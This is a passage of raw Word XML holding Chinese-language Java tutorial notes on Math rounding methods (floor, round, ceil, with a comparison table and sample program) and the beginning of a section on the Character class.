              </w:rPr>
              <w:br/>
              <w:t>将角度转换为弧度。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="53C9D2B1" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="885" w:type="dxa"/>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4FE6BA06"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27</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9040" w:type="dxa"/>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617B571D"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hyperlink r:id="rId249" w:tgtFrame="https://www.runoob.com/java/_blank" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                  <w:color w:val="006600"/>
                  <w:sz w:val="15"/>
                  <w:szCs w:val="15"/>
                </w:rPr>
                <w:t>random()</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:br/>
              <w:t>返回一个随机数。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="00A4C45E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C0E0B7C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Math </w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> floor,round </w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ceil </w:t>
      </w:r>
      <w:r>
        <w:t>方法实例比较</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9925" w:type="dxa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1354"/>
        <w:gridCol w:w="2846"/>
        <w:gridCol w:w="3175"/>
        <w:gridCol w:w="2550"/>
      </w:tblGrid>
      <w:tr w:rsidR="004C452C" w14:paraId="59D94A96" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="555555"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="555555"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="555555"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="555555"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="555555"/>
            <w:tcMar>
              <w:top w:w="36" w:type="dxa"/>
              <w:left w:w="36" w:type="dxa"/>
              <w:bottom w:w="36" w:type="dxa"/>
              <w:right w:w="36" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="51DB7CDF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="555555"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="555555"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="555555"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="555555"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="555555"/>
            <w:tcMar>
              <w:top w:w="36" w:type="dxa"/>
              <w:left w:w="36" w:type="dxa"/>
              <w:bottom w:w="36" w:type="dxa"/>
              <w:right w:w="36" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6C5260BC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>Math.floor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="555555"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="555555"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="555555"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="555555"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="555555"/>
            <w:tcMar>
              <w:top w:w="36" w:type="dxa"/>
              <w:left w:w="36" w:type="dxa"/>
              <w:bottom w:w="36" w:type="dxa"/>
              <w:right w:w="36" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2F55F174" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>Math.round</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="555555"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="555555"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="555555"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="555555"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="555555"/>
            <w:tcMar>
              <w:top w:w="36" w:type="dxa"/>
              <w:left w:w="36" w:type="dxa"/>
              <w:bottom w:w="36" w:type="dxa"/>
              <w:right w:w="36" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0F1CAB03" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>Math.ceil</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="28F48370" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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000F34B0"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1.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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6264EF65"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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5540DD05"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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346BDC70"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="2C125DD5" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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476335DB"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1.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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4415E80D"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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17741E3B"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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5CB8794D"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="43B4704C" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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57A68C92"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1.6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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2B6B8EDD"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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5854753F"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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3B22DE3C"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="76B0BD52" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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7C44FEE7"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-1.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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7DF3E850"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-2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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112443C5"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-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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3748960A"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-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="08B7CFC6" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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755BDBC3"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-1.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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600AB41C"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-2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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15AC8225"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-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D4D4D4"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D4D4D4"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D4D4D4"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D4D4D4"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="16099578"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-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="48F7C20B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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0EAA94BB"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-1.6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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41188D72"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-2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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65F71B23"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-2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D4D4D4"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D4D4D4"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D4D4D4"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D4D4D4"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F6F4F0"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="53D90DEB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="420" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:color w:val="333333"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="63DBF962" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08FB1932" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">public class Main {   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2402388E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  public static void main(String[] args) {   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04406B91" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    double[] nums = { 1.4, 1.5, 1.6, -1.4, -1.5, -1.6 };   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366B5432" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    for (double num : nums) {   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E89D6AF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      test(num);   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FDCD38" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    }   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB6A86C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  }   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0968113A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  private static void test(double num) {   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78699750" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    System.out.println("Math.floor(" + num + ")=" + Math.floor(num));   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DECF94" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    System.out.println("Math.round(" + num + ")=" + Math.round(num));   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCE0973" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    System.out.println("Math.ceil(" + num + ")=" + Math.ceil(num));   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4D72D2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  }   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3AA74C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2130F39D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="737" w:name="_Toc159780166"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Character</w:t>
      </w:r>
      <w:bookmarkEnd w:id="737"/>
    </w:p>
    <w:p w14:paraId="6DFEA22D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Character </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类用于对单个字符进行操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA097E0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Character </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类在对象中包装一个基本类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> char </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EF4C36" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="524B734E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>char ch = 'a';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33936050" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37E2A2E6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">// Unicode </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>字符表示形式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C901020" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">char uniChar = '\u039A'; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC74271" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="304C9FF9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>字符数组</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A1F2C5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>char[] charArray ={ 'a', 'b', 'c', 'd', 'e' };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEB24D8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10F12B91" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然而，在实际开发过程中，我们经常会遇到需要使用对象，而不是内置数据类型的情况。为了解决这个问题，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语言为内置数据类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提供了包装类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Character</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F211CE4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="045E07AF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Character</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类提供了一系列方法来操纵字符。你可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Character</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的构造方法创建一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Character</w:t>
      </w:r>
